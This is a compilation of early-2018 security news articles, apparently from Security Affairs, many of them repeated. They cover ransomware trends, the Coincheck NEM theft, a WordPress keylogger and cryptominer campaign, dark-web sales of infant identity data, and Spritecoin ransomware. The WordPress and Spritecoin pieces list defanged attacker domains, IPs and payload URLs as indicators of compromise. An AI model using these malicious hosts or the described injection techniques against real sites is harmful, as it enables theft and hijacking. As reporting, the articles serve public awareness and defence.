It is taken into account the tactics of infection, attack methods, development and distribution techniques used by hackers to target and compromise business and customers alike. There was a surge of 90% in ransomware detection for business customers in such way that it had become the fifth most detected threat. Regarding its modus operandi, the researchers found out a change in the distribution of malicious payloads, which includes banker Trojans and cryptocurrency miners.

Ransomware was on the rise, but it was not the only method employed by hackers. The report reveals that hackers had used banking trojans, spyware and hijackers to steal data, login credentials, contact lists, credit card data and spy on the user as an alternative way to compromise system security. The report discovered that hijackers detection grew 40% and spyware detection grew 30%. The report lists the Top 10 business threat detections with the five most significant threats being: Hijacker, Adware, Riskware Tool, Backdoor, and Ransomware respectively.

ransomware

While the report covers a variety of threats, it emphasizes how malware outbreak had evolved. A game changer to the ransomware outbreak like WannaCry was the government exploit tool EternalBlue that was leaked and has been employed to compromise update processes and increased geo-targeting attacks. According to the report these tactics had been adopted to bypass traditional methods of detection.

The report highlights the delivery techniques utilized by ransomware due to the EternalBlue exploit tool leaked from NSA. The usage of this exploit tool was a ground break landmark to the development of WannaCry and NotPetya ransomware. The EternalBlue (CVE-2017-0144) is a vulnerability in Server Message Block (SMB) handling present in many Windows operating systems. WannaCry was able to widespread globally due to operating systems that were not properly updated.

The report dedicates a special attention to NotPetya ransomware, as it was influenced by ransomware Petya and WannaCry. This ransomware has used two Server Message Block (SMB) vulnerabilities: EternalBlue (CVE2017-0144) and EternalRomance (CVE-2017-0145) and was also able to encrypt the MFT (Master File Table) and the MBR (Master Boot Record) on affected systems. Other malware analyzed in the report, that used the leaked exploit tools from the  NSA was: Adylkuzz, CoinMiner, and Retefe.

The researchers also unveil a new attack vector employed by hackers: Geo Targeting attacks. In this type of attack, groups of hackers or rogue nations employ a variety of techniques to disrupt, destabilize, or compromise data in specific countries. The Magniber malicious code targeted South Korea specifically and the BadRabbit had targeted Ukraine.  Although NotPetya emerged in Ukraine its action was not limited within its borders.

Finally, the report brings forth to light trends based on data collected. Cyptocurrency miners already become a new threat with the recent news of a steal of bitcoins from Japan. Other trends to watch out this year in the report is the attacks on the supply chain, the increase of malware in MAC systems and leaks in government and in companies that will lead to new zero-day vulnerabilities.

Sources:

https://www.darkreading.com/endpoint/ransomware-detections-up-90–for-businesses-in-2017/d/d-id/1330909

http://www.information-age.com/ransomware-detections-increased-90-123470549/

https://www.washingtontimes.com/news/2018/jan/25/ransomware-detections-90-percent-2017-leaked-nsa-e/

http://www.computerweekly.com/news/252433761/Ransomware-was-most-popular-cyber-crime-tool-in-2017

https://www.infosecurity-magazine.com/news/malware-tactics-shifted/

https://press.malwarebytes.com/2018/01/25/malwarebytes-annual-state-malware-report-reveals-ransomware-detections-increased-90-percent/

https://www.malwarebytes.com/pdf/white-papers/CTNT_2017stateofmalware/

About the author Luis Nakamoto

Luis Nakamoto is a Computer Science student of Cryptology and an enthusiastic of information security having participated in groups like Comissão Especial de Direito Digital e Compliance (OAB/SP) and CCBS (Consciência Cibernética Brasil) as a researcher in new technologies related to ethical hacking, forensics and reverse engineering. Also, a prolific and compulsive writer participating as a Redactor to Portal Tic from Sebrae Nacional.

Pierluigi Paganini

(Security Affairs – malware, cybercrime)

The post A new report from MALWAREBYTES reveals a rise of 90% on ransomware detection in business appeared first on Security Affairs.

E Hacking News – Latest Hacker News and IT Security News: Japan cryptocurrency exchange to refund stolen assets worth $400m

Coincheck, one of Japan’s major cryptocurrency exchange, has promised to refund to its customers about $423m (£282m) stolen by hackers two days ago in one of the biggest thefts of digital funds.

The hack occurred on Friday, when the company detected an “unauthorised access” of the exchange and suspended trading for all cryptocurrencies apart from bitcoin.

The attackers were able to access the company’s NEM coins, which are a lesser known but still the world’s 10th biggest cryptocurrency by market capitalisation. The losses went up to about $534m (£380m).

The company has stated that it will reimburse the affected customers to nearly 90% of their loss using cash.

Over 260,000 are reported to have been affected by the hack.

According to Coincheck, the hackers were able to steal the NEM coins because they were kept in online “hot wallets” instead of the more secure and offline “cold wallets.”

The company claims that it is aware of the digital address where the coins have been transferred and believes the assets are recoverable.


E Hacking News - Latest Hacker News and IT Security News

Japan cryptocurrency exchange to refund stolen assets worth $400m

Coincheck, one of Japan’s major cryptocurrency exchange, has promised to refund to its customers about $423m (£282m) stolen by hackers two days ago in one of the biggest thefts of digital funds.

The hack occurred on Friday, when the company detected an “unauthorised access” of the exchange and suspended trading for all cryptocurrencies apart from bitcoin.

The attackers were able to access the company’s NEM coins, which are a lesser known but still the world’s 10th biggest cryptocurrency by market capitalisation. The losses went up to about $534m (£380m).

The company has stated that it will reimburse the affected customers to nearly 90% of their loss using cash.

Over 260,000 are reported to have been affected by the hack.

According to Coincheck, the hackers were able to steal the NEM coins because they were kept in online “hot wallets” instead of the more secure and offline “cold wallets.”

The company claims that it is aware of the digital address where the coins have been transferred and believes the assets are recoverable.

Japan-based digital exchange Coincheck to refund to customers after cyberheist

Coincheck announced it will refund about $400 million to 260,000 customers after the hack, the company will use its own funds.

On Friday the news of the hack of the Japan-based digital exchange Coincheck caused the drop in the value of the major cryptocurrencies, the incident had a significant impact on the NEM value that dropped more than 16 percent in 24 hours.

The company suspended the operations of deposits and withdrawals for all the virtual currencies except Bitcoin, the exchange announced it was investigating an “unauthorised access” to the exchange.

According to the company, the hackers stole worth half a billion US dollars of NEM, the 10th biggest cryptocurrency by market capitalization.

The hackers stole 58 billion yen ($530 million), an amount of money that is greater than the value of bitcoins which disappeared from MtGox in 2014.

Coincheck was founded in 2012, it is one of the most important cryptocurrency exchange in Asia.

The company announced it will refund about $400 million to customers after the hack. 

Coincheck will use its own funds to reimburse about 46.3 billion yen to its 260,000 customers who were impacted by the cyberheist.

“At 3 am (1800 GMT) today, 523 million NEMs were sent from the NEM address of Coincheck. It’s worth 58 billion yen based on the calculation at the rate when detected,” said Coincheck COO Yusuke Otsuka.

“We’re still examining how many of our customers are affected,”

Experts believe that the Financial Services Agency will to take disciplinary measures against Coincheck.

It has been estimated that as many as 10,000 businesses in Japan accept bitcoin and bitFlyer, nearly one-third of global Bitcoin transactions in December were denominated in yen.The Cryptocurrencies, and in particular Bitcoin, are very popular in Japan, in April, the Bitcoin was proclaimed by the local authorities as legal tender.

According to Japanese bitcoin monitoring site Jpbitcoin.com, in November, yen-denominated bitcoin trades reached a record 4.51 million bitcoins, or nearly half of the world’s major exchanges of 9.29 million bitcoin.

Japanese media criticized the company blaming the management to have underestimated the importance of security of its investor,  they said Coincheck “expanded business by putting safety second”.

Politicians and experts that participated in the World Economic Forum in Davos issued warnings about the dangers of cryptocurrencies, it is expected that government will adopt further measures to avoid abuse and illegal uses of cryptocrurrencies.

 

Pierluigi Paganini

(Security Affairs – Coincheck, Security Breach)

The post Japan-based digital exchange Coincheck to refund to customers after cyberheist appeared first on Security Affairs.

Security Affairs: Japan-based digital exchange Coincheck to refund to customers after cyberheist

Coincheck announced it will refund about $400 million to 260,000 customers after the hack, the company will use its own funds.

On Friday the news of the hack of the Japan-based digital exchange Coincheck caused the drop in the value of the major cryptocurrencies, the incident had a significant impact on the NEM value that dropped more than 16 percent in 24 hours.

The company suspended the operations of deposits and withdrawals for all the virtual currencies except Bitcoin, the exchange announced it was investigating an “unauthorised access” to the exchange.

According to the company, the hackers stole worth half a billion US dollars of NEM, the 10th biggest cryptocurrency by market capitalization.

The hackers stole 58 billion yen ($530 million), an amount of money that is greater than the value of bitcoins which disappeared from MtGox in 2014.

Coincheck was founded in 2012, it is one of the most important cryptocurrency exchange in Asia.

The company announced it will refund about $400 million to customers after the hack. 

Coincheck will use its own funds to reimburse about 46.3 billion yen to its 260,000 customers who were impacted by the cyberheist.

“At 3 am (1800 GMT) today, 523 million NEMs were sent from the NEM address of Coincheck. It’s worth 58 billion yen based on the calculation at the rate when detected,” said Coincheck COO Yusuke Otsuka.

“We’re still examining how many of our customers are affected,”

Experts believe that the Financial Services Agency will to take disciplinary measures against Coincheck.

It has been estimated that as many as 10,000 businesses in Japan accept bitcoin and bitFlyer, nearly one-third of global Bitcoin transactions in December were denominated in yen.The Cryptocurrencies, and in particular Bitcoin, are very popular in Japan, in April, the Bitcoin was proclaimed by the local authorities as legal tender.

According to Japanese bitcoin monitoring site Jpbitcoin.com, in November, yen-denominated bitcoin trades reached a record 4.51 million bitcoins, or nearly half of the world’s major exchanges of 9.29 million bitcoin.

Japanese media criticized the company blaming the management to have underestimated the importance of security of its investor,  they said Coincheck “expanded business by putting safety second”.

Politicians and experts that participated in the World Economic Forum in Davos issued warnings about the dangers of cryptocurrencies, it is expected that government will adopt further measures to avoid abuse and illegal uses of cryptocrurrencies.

 

Pierluigi Paganini

(Security Affairs – Coincheck, Security Breach)

The post Japan-based digital exchange Coincheck to refund to customers after cyberheist appeared first on Security Affairs.



Security Affairs

Attackers behind Cloudflare_solutions Keylogger are back, 2000 WordPress sites already infected

More than 2,000 WordPress sites have been infected with a malicious script that can deliver both a keylogger and the cryptocurrency miner CoinHive.

More than 2,000 sites running the WordPress CMS have been infected with a malicious script that can deliver both a keylogger and the in-browser cryptocurrency miner CoinHive.

This new hacking campaign was spotted by experts from the security firm Sucuri, the experts believe the attackers are the same that launched a campaign that infected 5,500 WordPress sites in December.

In both campaigns, the threat actors used a keylogger dubbed cloudflare[.]solutions, but be careful, there is no link to security firm Cloudflare.

After the discovery in December of campaign, the cloudflare[.]solutions domain was taken down, but this new discovery confirms that threat actors are still active and are using a new set of recently registers domains to host the malicious scripts that are injected into WordPress sites.

By querying the search engine PublicWWW,  researchers discovered that the number of infected sites includes 129 from the domain cdns[.]ws and 103 websites for cdjs[.]online.

“A few days after our keylogger post was released on Dec 8th, 2017, the Cloudflare[.]solutions domain was taken down. This was not the end of the malware campaign, however; attackers immediately registered a number of new domains including cdjs[.]online on Dec 8th, cdns[.]ws on Dec 9th, and msdns[.]online on Dec 16th.” reads the analysis published by Sucuri.

“PublicWWW has already identified relatively few infected sites: 129 websites for cdns[.]ws and 103 websites for cdjs[.]online, but it’s likely that the majority of the websites have not been indexed yet. Since mid-December, msdns[.]online has infected over a thousand websites, though the majority are reinfections from sites that have already been compromised.”

Most of the infected domains are tied to msdns[.]online, with over a thousand reported infections. In many cases, threat actors re-infected WordPress sites compromised in the previous campaign.

WordPress sites hacking

The attackers target outdated and poorly configured WordPress sites, they inject the cdjs[.]online script either a WordPress database (wp_posts table) or into the theme’s functions.php file.

The Keylogger script is able to capture data entered on every website form, including the admin login form, information is sent back to the attackers via the WebSocket protocol.

Just like previous versions of the campaign leveraging a Fake GoogleAnalytics Script, researchers identified a fake googleanalytics.js that loads an obfuscated script used to load the malicious scripts “startGoogleAnalytics” from the attackers’ domains.

Experts discovered many similarities also in the cryptominer component of this campaign.

“We’ve identified that the library jquery-3.2.1.min.js is similar to the encrypted CoinHive cryptomining library from the previous version, loaded from hxxp:// 3117488091/lib/jquery-3.2.1.min.js?v=3.2.11 (or hxxp://185 .209 .23 .219/lib/jquery-3.2.1.min.js?v=3.2.11, a more familiar representation of the IP address). This is not surprising since cdjs[.]online also exists on the server 185 .209 .23 .219.” continues the analysis.

“It’s interesting to note that this script extends the CoinHive library and adds an alternative configuration using the 185 .209 .23 .219 server (and now specifically cdjs[.]online) for LIB_URL and WEBSOCKET_SHARDS.”

According to Sucuri experts, the threat actors behind this hacking campaign are active at least since April 2017. Sucuri has tracked at least other three different malicious scripts hosted on the same cloudflare.solutions domain across the months.

The first attack leveraging on these scripts was observed in April when hackers used a malicious JavaScript file to embed banner ads on hacked sites.

In November, experts from Sucuri reported the same attackers were loading malicious scripts disguised as fake jQuery and Google Analytics JavaScript files that were actually a copy of the Coinhive in-browser cryptocurrency miner. By November 22, the experts observed 1,833 sites compromised by the attackers.

Experts noticed that this campaign is still not massive as the one spotted in December, anyway it could not be underestimated.

“While these new attacks do not yet appear to be as massive as the original cloudflare[.]solutions campaign, the reinfection rate shows that there are still many sites that have failed to properly protect themselves after the original infection,” concluded Sucuri.

Pierluigi Paganini

(Security Affairs – WordPress sites, keylogger)

The post Attackers behind Cloudflare_solutions Keylogger are back, 2000 WordPress sites already infected appeared first on Security Affairs.

Security Affairs: Attackers behind Cloudflare_solutions Keylogger are back, 2000 WordPress sites already infected

More than 2,000 WordPress sites have been infected with a malicious script that can deliver both a keylogger and the cryptocurrency miner CoinHive.

More than 2,000 sites running the WordPress CMS have been infected with a malicious script that can deliver both a keylogger and the in-browser cryptocurrency miner CoinHive.

This new hacking campaign was spotted by experts from the security firm Sucuri, the experts believe the attackers are the same that launched a campaign that infected 5,500 WordPress sites in December.

In both campaigns, the threat actors used a keylogger dubbed cloudflare[.]solutions, but be careful, there is no link to security firm Cloudflare.

After the discovery in December of campaign, the cloudflare[.]solutions domain was taken down, but this new discovery confirms that threat actors are still active and are using a new set of recently registers domains to host the malicious scripts that are injected into WordPress sites.

By querying the search engine PublicWWW,  researchers discovered that the number of infected sites includes 129 from the domain cdns[.]ws and 103 websites for cdjs[.]online.

“A few days after our keylogger post was released on Dec 8th, 2017, the Cloudflare[.]solutions domain was taken down. This was not the end of the malware campaign, however; attackers immediately registered a number of new domains including cdjs[.]online on Dec 8th, cdns[.]ws on Dec 9th, and msdns[.]online on Dec 16th.” reads the analysis published by Sucuri.

“PublicWWW has already identified relatively few infected sites: 129 websites for cdns[.]ws and 103 websites for cdjs[.]online, but it’s likely that the majority of the websites have not been indexed yet. Since mid-December, msdns[.]online has infected over a thousand websites, though the majority are reinfections from sites that have already been compromised.”

Most of the infected domains are tied to msdns[.]online, with over a thousand reported infections. In many cases, threat actors re-infected WordPress sites compromised in the previous campaign.

WordPress sites hacking

The attackers target outdated and poorly configured WordPress sites, they inject the cdjs[.]online script either a WordPress database (wp_posts table) or into the theme’s functions.php file.

The Keylogger script is able to capture data entered on every website form, including the admin login form, information is sent back to the attackers via the WebSocket protocol.

Just like previous versions of the campaign leveraging a Fake GoogleAnalytics Script, researchers identified a fake googleanalytics.js that loads an obfuscated script used to load the malicious scripts “startGoogleAnalytics” from the attackers’ domains.

Experts discovered many similarities also in the cryptominer component of this campaign.

“We’ve identified that the library jquery-3.2.1.min.js is similar to the encrypted CoinHive cryptomining library from the previous version, loaded from hxxp:// 3117488091/lib/jquery-3.2.1.min.js?v=3.2.11 (or hxxp://185 .209 .23 .219/lib/jquery-3.2.1.min.js?v=3.2.11, a more familiar representation of the IP address). This is not surprising since cdjs[.]online also exists on the server 185 .209 .23 .219.” continues the analysis.

“It’s interesting to note that this script extends the CoinHive library and adds an alternative configuration using the 185 .209 .23 .219 server (and now specifically cdjs[.]online) for LIB_URL and WEBSOCKET_SHARDS.”

According to Sucuri experts, the threat actors behind this hacking campaign are active at least since April 2017. Sucuri has tracked at least other three different malicious scripts hosted on the same cloudflare.solutions domain across the months.

The first attack leveraging on these scripts was observed in April when hackers used a malicious JavaScript file to embed banner ads on hacked sites.

In November, experts from Sucuri reported the same attackers were loading malicious scripts disguised as fake jQuery and Google Analytics JavaScript files that were actually a copy of the Coinhive in-browser cryptocurrency miner. By November 22, the experts observed 1,833 sites compromised by the attackers.

Experts noticed that this campaign is still not massive as the one spotted in December, anyway it could not be underestimated.

“While these new attacks do not yet appear to be as massive as the original cloudflare[.]solutions campaign, the reinfection rate shows that there are still many sites that have failed to properly protect themselves after the original infection,” concluded Sucuri.

Pierluigi Paganini

(Security Affairs – WordPress sites, keylogger)

The post Attackers behind Cloudflare_solutions Keylogger are back, 2000 WordPress sites already infected appeared first on Security Affairs.



Security Affairs

Cybercriminals are offering for sale infant fullz on the dark web

Cybercriminals are offering for sale infant fullz on the dark web, this is the first time that unscrupulous sellers offer this kind of merchandise on a black marketplace.

Crooks are offering for sale Social Security numbers of babies on the dark web, the news was reported by the CNN.

The news is disconcerting, this is the first time that unscrupulous sellers offer this kind of merchandise on a black marketplace.

The offer appeared on the Dream Market marketplace, one of the biggest Tor marketplace that has been around since around Nov/Dec 2013.

The seller is offering Social Security numbers of babies along with their dates of birth and mother’s maiden names, the ‘Infant fullz’ goes for $300 worth of bitcoin.

The slang term “Fullz” refers full packages of individuals’ identifying information. A “Fullz” package contains an individual’s name, Social Security number, birth date, account numbers and other data.

“Infant fullz get em befor tax seson [sic],” reads the ad.

‘Infant Fullz’ are a precious commodity in the criminal underground they allow crooks to access a clean credit history, they also allow crooks to apply for government benefits or take out mortgages.

The use of children PII is considered secure by cyber criminals because this specific type of identity theft could remain undiscovered for years.

“The listing for infant data was discovered by researchers at Terbium Labs, a dark web intelligence firm. The cost and age of the alleged victims came as a surprise to Emily Wilson, the company’s director of analysis.” states the CNN.

“Although the firm has seen child data for sale before, this was the first time it has seen infants’ data for sale.”

“It’s unusual to have information specifically marked as belonging to children or to infants on these markets,” Wilson said.

dark web

Identity theft crimes involving children is not a novelty, according to a 2011 report published by Carnegie Mellon University’s CyLab, the rate of this specific type of crimes for children as being 51 times greater than that of adults.

Researchers highlighted that “parents typically don’t monitor their children’s identities”.

Pierluigi Paganini

(Security Affairs – dark web, black marketplace)

The post Cybercriminals are offering for sale infant fullz on the dark web appeared first on Security Affairs.

Security Affairs: Cybercriminals are offering for sale infant fullz on the dark web

Cybercriminals are offering for sale infant fullz on the dark web, this is the first time that unscrupulous sellers offer this kind of merchandise on a black marketplace.

Crooks are offering for sale Social Security numbers of babies on the dark web, the news was reported by the CNN.

The news is disconcerting, this is the first time that unscrupulous sellers offer this kind of merchandise on a black marketplace.

The offer appeared on the Dream Market marketplace, one of the biggest Tor marketplace that has been around since around Nov/Dec 2013.

The seller is offering Social Security numbers of babies along with their dates of birth and mother’s maiden names, the ‘Infant fullz’ goes for $300 worth of bitcoin.

The slang term “Fullz” refers full packages of individuals’ identifying information. A “Fullz” package contains an individual’s name, Social Security number, birth date, account numbers and other data.

“Infant fullz get em befor tax seson [sic],” reads the ad.

‘Infant Fullz’ are a precious commodity in the criminal underground they allow crooks to access a clean credit history, they also allow crooks to apply for government benefits or take out mortgages.

The use of children PII is considered secure by cyber criminals because this specific type of identity theft could remain undiscovered for years.

“The listing for infant data was discovered by researchers at Terbium Labs, a dark web intelligence firm. The cost and age of the alleged victims came as a surprise to Emily Wilson, the company’s director of analysis.” states the CNN.

“Although the firm has seen child data for sale before, this was the first time it has seen infants’ data for sale.”

“It’s unusual to have information specifically marked as belonging to children or to infants on these markets,” Wilson said.

dark web

Identity theft crimes involving children is not a novelty, according to a 2011 report published by Carnegie Mellon University’s CyLab, the rate of this specific type of crimes for children as being 51 times greater than that of adults.

Researchers highlighted that “parents typically don’t monitor their children’s identities”.

Pierluigi Paganini

(Security Affairs – dark web, black marketplace)

The post Cybercriminals are offering for sale infant fullz on the dark web appeared first on Security Affairs.



Security Affairs

Trend Micro spotted a malvertising campaign abusing Google’s DoubleClick to deliver Coinhive Miner

Trend Micro uncovered a spike in the number of Coinhie miners over the past few days, including Coinhive, apparently linked to Google’s DoubleClick ads that are proposed on YouTube and other sites.

The number of cyber-attacks against cryptocurrencies is increased due to a rapid increase in the value of currencies such as Bitcoin and Ethereum.

Hackers targeted almost any actor involved in the business of cryptocurrencies, single users, miners and of course exchanges.

Security firms have detected several malware applications specifically designed to steal cryptocurrencies, and many websites were compromised to install script used to mine virtual coins abusing computational resources of unaware visitors.

Researchers at Trend Micro uncovered a spike in the number of Coinhie miners over the past few days apparently linked to Google’s DoubleClick ads that are proposed on YouTube and other sites.

“On January 24, 2018, we observed that the number of Coinhive web miner detections tripled due to a malvertising campaign. We discovered that advertisements found on high-traffic sites not only used Coinhive (detected by Trend Micro as JS_COINHIVE.GN), but also a separate web miner that connects to a private pool.”  states the analysis published by Trend Micro.

“We detected an almost 285% increase in the number of Coinhive miners on January 24. We started seeing an increase in traffic to five malicious domains on January 18. After closely examining the network traffic, we discovered that the traffic came from DoubleClick advertisements.

Coinhive

The researchers observed two separate web cryptocurrency miner scripts, both hosted on AWS, that were called from a web page that presents the DoubleClick ad.

The advertisement uses a JavaScript code that generates a random number between 1 and 101. If the number generated is greater than 10, the advertisement will call the coinhive.min.js script to mine 80% of the CPU power. For the remaining 10%, the advertisement launch a private web miner, the mqoj_1.js script.

“The two web miners were configured with throttle 0.2, which means the miners will use 80% of the CPU’s resources for mining.” continues the analysis.

Coinhive

Google promptly took action against the ads that abuse users’ resources violating its policies.

Blocking JavaScript-based applications from running on browsers can prevent the execution of Coinhive miners, the experts suggest to regularly patch and update web browsers to reduce the risks.

Pierluigi Paganini

(Security Affairs – cryptocurrency, Coinhive)

The post Trend Micro spotted a malvertising campaign abusing Google’s DoubleClick to deliver Coinhive Miner appeared first on Security Affairs.

Security Affairs: Trend Micro spotted a malvertising campaign abusing Google’s DoubleClick to deliver Coinhive Miner

Trend Micro uncovered a spike in the number of Coinhie miners over the past few days, including Coinhive, apparently linked to Google’s DoubleClick ads that are proposed on YouTube and other sites.

The number of cyber-attacks against cryptocurrencies is increased due to a rapid increase in the value of currencies such as Bitcoin and Ethereum.

Hackers targeted almost any actor involved in the business of cryptocurrencies, single users, miners and of course exchanges.

Security firms have detected several malware applications specifically designed to steal cryptocurrencies, and many websites were compromised to install script used to mine virtual coins abusing computational resources of unaware visitors.

Researchers at Trend Micro uncovered a spike in the number of Coinhie miners over the past few days apparently linked to Google’s DoubleClick ads that are proposed on YouTube and other sites.

“On January 24, 2018, we observed that the number of Coinhive web miner detections tripled due to a malvertising campaign. We discovered that advertisements found on high-traffic sites not only used Coinhive (detected by Trend Micro as JS_COINHIVE.GN), but also a separate web miner that connects to a private pool.”  states the analysis published by Trend Micro.

“We detected an almost 285% increase in the number of Coinhive miners on January 24. We started seeing an increase in traffic to five malicious domains on January 18. After closely examining the network traffic, we discovered that the traffic came from DoubleClick advertisements.

Coinhive

The researchers observed two separate web cryptocurrency miner scripts, both hosted on AWS, that were called from a web page that presents the DoubleClick ad.

The advertisement uses a JavaScript code that generates a random number between 1 and 101. If the number generated is greater than 10, the advertisement will call the coinhive.min.js script to mine 80% of the CPU power. For the remaining 10%, the advertisement launch a private web miner, the mqoj_1.js script.

“The two web miners were configured with throttle 0.2, which means the miners will use 80% of the CPU’s resources for mining.” continues the analysis.

Coinhive

Google promptly took action against the ads that abuse users’ resources violating its policies.

Blocking JavaScript-based applications from running on browsers can prevent the execution of Coinhive miners, the experts suggest to regularly patch and update web browsers to reduce the risks.

Pierluigi Paganini

(Security Affairs – cryptocurrency, Coinhive)

The post Trend Micro spotted a malvertising campaign abusing Google’s DoubleClick to deliver Coinhive Miner appeared first on Security Affairs.



Security Affairs

Cryptocurrencies Black Friday – Japan-based digital exchange Coincheck hacked

It is a black Friday for cryptocurrencies, after the news of the hack of the Japan-based digital exchange Coincheck the value of major cryptocurrencies dropped.

It is a black Friday for cryptocurrencies, the news of the hack of the Japan-based digital exchange Coincheck had a significant impact on their value.

Coincheck was founded in 2012, it is one of the most important cryptocurrency exchange in Asia.

The Coincheck suspended the operations of deposits and withdrawals for all the virtual currencies except bitcoin, the exchange announced it was investigating an “unauthorised access” to the exchange.

According to the company, the hackers stole worth half a billion US dollars of NEM, the 10th biggest cryptocurrency by market capitalization.

The news of the incident has a significant impact on the NEM value that dropped more than 16 percent in 24 hours.

“At 3 am (1800 GMT) today, 523 million NEMs were sent from the NEM address of Coincheck. It’s worth 58 billion yen based on the calculation at the rate when detected,” said Coincheck COO Yusuke Otsuka.

“We’re still examining how many of our customers are affected,”

Coincheck hack NEM Value

NEM Charts – CoinMarketCap.com

The experts at the exchange are investigating the security breach to find out whether it was from Japan or another country.

Coincheck discovered the incident at 11.25 am and notified the suspension of trading for all cryptocurrencies apart from bitcoin via Twitter.

In February 2014, Mt. Gox suspended trading and filed for bankruptcy protection from creditors.

At the time, the company was handling over 70% of all bitcoin transactions worldwide, it announced that approximately 850,000 bitcoins ($450 million at the time) belonging to customers and the company were stolen.

Pierluigi Paganini

(Security Affairs – Coincheck, Security Breach)

 

 

The post Cryptocurrencies Black Friday – Japan-based digital exchange Coincheck hacked appeared first on Security Affairs.

Security Affairs: Cryptocurrencies Black Friday – Japan-based digital exchange Coincheck hacked

It is a black Friday for cryptocurrencies, after the news of the hack of the Japan-based digital exchange Coincheck the value of major cryptocurrencies dropped.

It is a black Friday for cryptocurrencies, the news of the hack of the Japan-based digital exchange Coincheck had a significant impact on their value.

Coincheck was founded in 2012, it is one of the most important cryptocurrency exchange in Asia.

The Coincheck suspended the operations of deposits and withdrawals for all the virtual currencies except bitcoin, the exchange announced it was investigating an “unauthorised access” to the exchange.

According to the company, the hackers stole worth half a billion US dollars of NEM, the 10th biggest cryptocurrency by market capitalization.

The news of the incident has a significant impact on the NEM value that dropped more than 16 percent in 24 hours.

“At 3 am (1800 GMT) today, 523 million NEMs were sent from the NEM address of Coincheck. It’s worth 58 billion yen based on the calculation at the rate when detected,” said Coincheck COO Yusuke Otsuka.

“We’re still examining how many of our customers are affected,”

Coincheck hack NEM Value

NEM Charts – CoinMarketCap.com

The experts at the exchange are investigating the security breach to find out whether it was from Japan or another country.

Coincheck discovered the incident at 11.25 am and notified the suspension of trading for all cryptocurrencies apart from bitcoin via Twitter.

In February 2014, Mt. Gox suspended trading and filed for bankruptcy protection from creditors.

At the time, the company was handling over 70% of all bitcoin transactions worldwide, it announced that approximately 850,000 bitcoins ($450 million at the time) belonging to customers and the company were stolen.

Pierluigi Paganini

(Security Affairs – Coincheck, Security Breach)

 

 

The post Cryptocurrencies Black Friday – Japan-based digital exchange Coincheck hacked appeared first on Security Affairs.



Security Affairs

Security Affairs: Monero Crypto-Currency Mining Operation impacted 30 Million users

Security experts from PaloAlto Networks uncovered a large-scale crypto-currency mining operation that involved around 30 million systems worldwide.

Hackers also used the Adf.ly URL shortening service that remunerates users when someone clicks on the link.  When users clicked on these Adf.ly URLs, they were redirected and found themselves downloading the crypto-currency mining malware instead.

The miner used in this Monero cryptocurrency mining operation execute XMRig mining software via VBS files, and leverages XMRig proxy services to hide the ultimate mining pool destination.

Researchers also noticed that threat actors use the Nicehash marketplace to trade hashing processing power.

According to the experts from PaloAlto the date October 20, 2017, was a milestone in this operation. Before October 20, 2017, the attackers were using the Windows built-in BITSAdmin tool to download the XMRig mining tool from a remote location. Apart from a few exceptions, the final payload was primarily installed with the filename ‘msvc.exe’.

Monero Cryptocurrency Mining Operation before

Pierluigi Paganini

(Security Affairs – Monero mining operation, hacking)

The post Monero Crypto-Currency Mining Operation impacted 30 Million users appeared first on Security Affairs.



Security Affairs

Monero Crypto-Currency Mining Operation impacted 30 Million users

Security experts from PaloAlto Networks uncovered a large-scale crypto-currency mining operation that involved around 30 million systems worldwide.

Hackers also used the Adf.ly URL shortening service that remunerates users when someone clicks on the link.  When users clicked on these Adf.ly URLs, they were redirected and found themselves downloading the crypto-currency mining malware instead.

The miner used in this Monero cryptocurrency mining operation execute XMRig mining software via VBS files, and leverages XMRig proxy services to hide the ultimate mining pool destination.

Researchers also noticed that threat actors use the Nicehash marketplace to trade hashing processing power.

According to the experts from PaloAlto the date October 20, 2017, was a milestone in this operation. Before October 20, 2017, the attackers were using the Windows built-in BITSAdmin tool to download the XMRig mining tool from a remote location. Apart from a few exceptions, the final payload was primarily installed with the filename ‘msvc.exe’.

Monero Cryptocurrency Mining Operation before

Pierluigi Paganini

(Security Affairs – Monero mining operation, hacking)

The post Monero Crypto-Currency Mining Operation impacted 30 Million users appeared first on Security Affairs.

Security Affairs: Spritecoin ransomware masquerades as cryptocurrency wallet and also harvests victim’s data

Fortinet discovered a strain of ransomware dubbed Spritecoin ransomware that only allows victims Monero payments and pretends to be a cryptocurrency-related password store.

Researchers from Fortinet FortiGuard Labs has discovered a strain of ransomware that only allows victims Monero payments and pretends to be a cryptocurrency-related password store.

The ransomware poses itself as a “spritecoin” wallet, it asks users to create their desired password, but instead of downloading the block-chain it encrypts the victim’s data files.

The malware asks for a 0.3 Monero ransom ($105 USD at the time of writing) and drops on the target system a ransom note of “Your files are encrypted.”

SpriteCoin ransomware

The malware includes an embedded SQLite engine, a circumstance that leads experts to believe it also implements a credentials harvesting feature for Chrome and Firefox credential store. The malicious code appends the .encrypted file extension to encrypted files (i.e. resume.doc.encrypted).

While decrypting the files, the Spritecoin ransomware also deploys another piece of malware that is able to harvest certificates, parse images, and control the web camera.

“In a cruel twist, if the victim decides to pay and obtain a decryption key they are then delivered a new malicious executable [80685e4eb850f8c5387d1682b618927105673fe3a2692b5c1ca9c66fb62b386b], detected as W32/Generic!tr.” reads the report.

“While have not yet fully analyzed this malicious payload, we can verify that it does have the capability to activate web cameras and parse certificates and keys that will likely leave the victim more compromised than before.”

The experts speculate the ransomware is being spread via forum spam that targets users interested in cryptocurrency.

“Ransomware is usually delivered via social engineering techniques, but can also be delivered without user interaction via exploits. These often arrive (but are not limited to) via email, exploit kits, malicious crafted Excel/Word/PDF macros, or JavaScript downloaders.” states the analysis published by Fortinet.

“The attacker often uses social engineering and carefully crafted malicious emails to trick and entice the victim to run these executables. These files are often seen using compelling file names to lure the victim into opening the file. Usually, the ransomware requires some user interaction to successfully compromise the victim’s machine.”

In this case, the threat arrives as a “SpriteCoin” package (spritecoind[.]exe) under the guise of a SpriteCoin crypto-currency wallet.”

Once installed on the victim’s machine, the malware will present a user with a prompt to “Enter your desired wallet password.”

SpriteCoin ransomware

When the victims provide their credentials the Spritecoin ransomware inform users it is downloading the blockchain, while it is actually encrypting the files.

The ransomware connects to a TOR site via an Onion proxy (http://jmqapf3nflatei35[.]onion.link/*) that allows the victim to communicate with the attacker’s website without the need for a TOR connection.

Further details, including IoCs are included in the report.

Pierluigi Paganini

(Security Affairs – Spritecoin ransomware, Monero)

 

The post Spritecoin ransomware masquerades as cryptocurrency wallet and also harvests victim’s data appeared first on Security Affairs.



Security Affairs

Spritecoin ransomware masquerades as cryptocurrency wallet and also harvests victim’s data

Fortinet discovered a strain of ransomware dubbed Spritecoin ransomware that only allows victims Monero payments and pretends to be a cryptocurrency-related password store.

